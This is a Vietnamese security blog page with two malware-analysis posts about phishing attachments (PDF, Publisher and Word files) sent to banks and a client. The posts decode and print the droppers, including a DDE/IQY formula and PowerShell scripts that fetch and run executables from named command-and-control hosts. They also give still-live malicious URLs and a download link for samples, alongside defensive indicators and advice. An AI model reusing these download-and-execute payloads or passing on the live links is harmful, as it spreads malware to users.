Showing posts with label malicious file. Show all posts
Showing posts with label malicious file. Show all posts

Sunday, August 26, 2018

Chỉ là APT attack vô bank thôi mà làm quá

Đúng như tiêu đề, thực sự nếu đơn vị nào public ra ngoài internet hằng ngày hoặc đang có dịch vụ trọng yếu về kinh tế chính trị thì bị attack APT hay là các kiểu tấn công khác thì nhiều hơn cơm bữa. Vấn đề là bao nhiêu cái được phát hiện, bao nhiêu cái được xử lý, và xử lý ở mức độ nào mới quan trọng.

Lưu ý: Tất cả các link độc hại đều vẫn còn online, người đọc nên cẩn trọng khi click

Thôi vào vấn đề chính! Nghe đồn đợt này đang có tấn công APT nhắm vào banking, ATM gì gì đó, ... Góc nhìn của mình thì chuyện dĩ nhiên và rất bình thường :D

Ông anh làm bên ngân hàng bạn báo có mẫu APT mới đang attack, cá nhân mình rất đánh giá cao cảnh báo kiểu này. Đang bận đọc báo về tỉ phú-làm giàu không vì bán tài nguyên quốc gia hay đầu độc dân tộc-xử lý chuyện gia đình. Cũng ráng ngó qua em nó xíu :D
Nhìn lướt qua mấy kiểu APT attack gần đây thì toàn phishing đính kèm file các kiểu. Quanh đi quẩn lại chỉ có 3 loại, PDF, M$ Office và Exploit cả hai cái trên :v

Thì mẫu đầu tiên là PDF.

Nhận được file thì vài thủ thuật nhỏ ta biết định dạng file luôn mặc dù ông anh gửi đã modify để tránh trường hợp click nhầm :D

https://www.virustotal.com/#/file/21afdc9bba64dc35900871f6876efd426ca33a96535c0529dc8d55ad27678073/detection => Lúc đầu hình như chỉ có 4-5 AV detect được :D mà kệ mịa đi, không nên đặt niềm tin vào hãng trong những trường hợp này :v

Dễ dàng ta thấy(quen thói thích thể hiện từ thời phổ thông)

Thông thường thì ta quan tâm đến nhóm màu cam, nhưng trong trường hợp này thì chỉ cần màu đỏ là đủ rồi :D
Theo như kết quả từ mấy câu lệnh nhảm nhí thì nó drop ra một file *.iqy sau đó execute lên thôi mà :D
nó sẽ dowload file hxxp://g50e.com/dab.1 về và thực thi. Trong đó có đoạn code rất tầm thường như sau:

='cmd'|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -sta -nop -c IEX ((new-object net.webclient).downloadstring(\"http://g50e.com/dub.2\"))'!A0

Nhìn lướt qua thì thấy nó download thêm thằng nào nữa từ C&C server.
[430]$ curl http://g50e.com/dub.2
$cheds = "http://g50e.com/security",""foreach($ched in $cheds){
Try{ 
$tp = "$env:temp\total.exe"$wc = New-Object System.Net.WebClient$wc.DownloadFile($ched, $tp)Start-Process $tpbreak 
} 
Catch{} 
}


Ờ thì download thêm một thanh niên nữa về execute lên thôi mà. Report thằng này là được rồi :D
https://www.virustotal.com/#/file/2b4f1c3755982b71bc709e4ddf101fd713f8d64fcbe1f251f4e22c8ffe69907b/detection
 Đến đây là đi nhậu được rồi :D

Mẫu OLE 

Mẫu tiếp theo là mình nhận trực tiếp từ khách hàng của mình, họ dùng mấy tool chuyên về web
https://www.virustotal.com/#/file/bc09a4f2218993ef8d3b9136ceee5f162c67fd27a5cd3a6b9a6ab5704c932e9b/detection
File *.pub có thể hơi lạ nhưng nó chỉ là OLE file mà thôi :D Nên đám này thường sẽ có hai hướng: 1 là exploit app, 2 là nhúng VBA.
Nhìn lướt qua thì nó nhúng VBA chắc luôn
Nhìn đoạn code là thấy ngu ngu rồi, không rõ ràng nên phải extract file kia ra đề biết nó download cái nồi gì về :D
Ừ thì đại loại nó download file hxxp://r48t.com/input về đổi tên thành appkey.exe và thực thi thôi
https://www.virustotal.com/#/file/5f8578deeaf3188ad284136f923afaff79b8334525bb26d9bd545f13627bb86d/detection
Đến giờ chẳng được mấy thằng AV detect.

Tổng kết 
- Đừng bao giờ tin tưởng quá vào Anti-Virus
- C&C domain:
  • f67i.com 
  • g78k.com
  • g50e.com
  • r48t.com
Thực ra còn vài mẫu nữa nhưng cơ chế chung cũng kiểu như vậy, và phần khác là một số anh em bank khác không gửi mẫu trực tiếp nên mình cũng không có cơ sở phân tích tiếp.
- Người làm an toàn thông tin cho bank nên làm gì:

  • Chặn ngay các truy cập đến domain và IP tương ứng 
  • Rà soát lại hệ thống có bao nhiêu người đã tải malware về và xử lý.
  • Chặn luôn các email phát tán malware => Mai tỉnh thì update sau :v
  • Join cộng đồng làm security cho bank để chia sẻ các case nghi ngờ hoặc nhận thông tin cập nhật để phòng thủ tốt hơn. 


Sunday, July 30, 2017

Phân tích vài mẫu mã độc nhúng trong File MS Word

Vào một buổi sáng đẹp trời, khách hàng thông báo rằng, họ nhận được rất nhiều email giả danh lãnh đạo :v trong email đó có rất nhiều đường link đáng ngờ, nên nhờ chúng tôi phân tích và đưa ra giải pháp xử lý.

Việc đầu tiên cần làm là chặn tất cả các kết nối đến các đường link độc hại trên. Một điều may mắn là hệ thống của khách hàng sử dụng proxy cho tất cả các kết nối internet nên việc chặn các trang web độc hại được thực hiện khá là nhanh chóng, hơn nữa việc log đầy đủ thông tin truy cập internet của người dùng sẽ dễ dàng xác định được số lượng người dùng đã click vào đường link độc hại hoặc đã bị nhiễm malware.

Dưới đây là các đường link độc hại mà chúng tôi thu thập được dựa trên các thông tin khách hàng cung cấp.

Lưu ý: Các link dưới đây có thể vẫn còn chứa những đoạn mã gây nguy hại cho máy tính của các bạn
  • hxxp://benbirdsong.com/DLZP020721/ 
  • hxxp://danielmerchen.com/TZEX247131/ 
  • hxxp://pkfans.com/KCOK937437/ 
  • hxxp://vafotografia.com.br/SUOZ110455/ 
  • hxxp://bradnance.com/ZRXE577815/
Sau khi tải hết các file từ các site trên về chúng tôi nhận thấy chỉ có duy nhất 2 mẫu chính mà thôi. Và cũng không có gì ngạc nhiên khi các antivirus không thể nhận diện được 2 mẫu này.

Làm việc với "em" đầu tiên https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/1500961161/

Dễ dàng ta thấy rằng hai file trên thuộc dạng file MS Word 97-2003
À đùa chút thôi 😄

Mẫu này không hề giống với mẫu RTF mà anh Kienmanowar đã phân tích
Dùng thử tool Officemalscanner thì không thấy mã độc đâu hết 😕 Chắc là do nó chỉ có VBA script 😁



Thôi đành dùng bộ oletools vậy:
Nhìn cái mớ hổ lốn này cũng mệt 🙈 Làm đẹp nó lại với ViperMonkey 😈. Tập trung vào hàm Document_Open() và tính toán sơ bộ ta có một chuỗi base64:
cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9qcGdwaG90b2V2ZW50cy5jb20vdS8saHR0cDovL3Byb2RldmluYy5jb20vY3p3amZ1Z3dqLyxodHRwOi8vbGVjaGVsZW9uLmNvbS93cC1jb250ZW50L290dXhpLyxodHRwOi8vcnlhbmtlaXNlci5uZXQvdmtyc2dueWNzYS8saHR0cDovL3p2YXJnYS5jb20veXZ2c3AvJy5TcGxpdCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtcCArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJHVybCBpbiAkdXJscyl7dHJ5eyR3ZWJjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhdGgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7fX0=
Giờ thì dễ dàng ta có đoạn code như sau:

powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://jpgphotoevents.com/u/,http://prodevinc.com/czwjfugwj/,http://lecheleon.com/wp-content/otuxi/,http://ryankeiser.net/vkrsgnycsa/,http://zvarga.com/yvvsp/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}
Các link trên download về được 2 file .EXE khác nhau:

Tương tự với file https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/

Ta dễ dàng có được đoạn code sau:
powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://siindia.in/oagcmggpa/,http://www.todofrog.com/pzpk/,http://segurodecenalsinoct.segurox.es/gn/,http://rgv2.com/wjblnwy/,http://gracetheweb.co.uk/cdybh/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}
Từ đống link trên ta thu được một file https://virustotal.com/en/file/7beddab6ff9b2c1049a7fc31becca3230e00be160505af10b287d5fa26d815b7/analysis/

Công việc tiếp theo là submit hết các file cho đám AV. Đồng thời rà soát lại log trên hệ thống tập trung và phối hợp với IThelpdesk tiến hành gỡ bỏ malware trên các máy đã bị nhiễm.

Đến đây tạm ổn rồi kéo anh em đi nhậu cho khỏe chứ không rảnh phân tích đám file EXE kia 😎

Link download mẫu cho bạn nào cần https://drive.google.com/open?id=0B6x4m_EtB2wBeTRKM0xhbWhQLVk sử dụng password kinh điển để giải nén.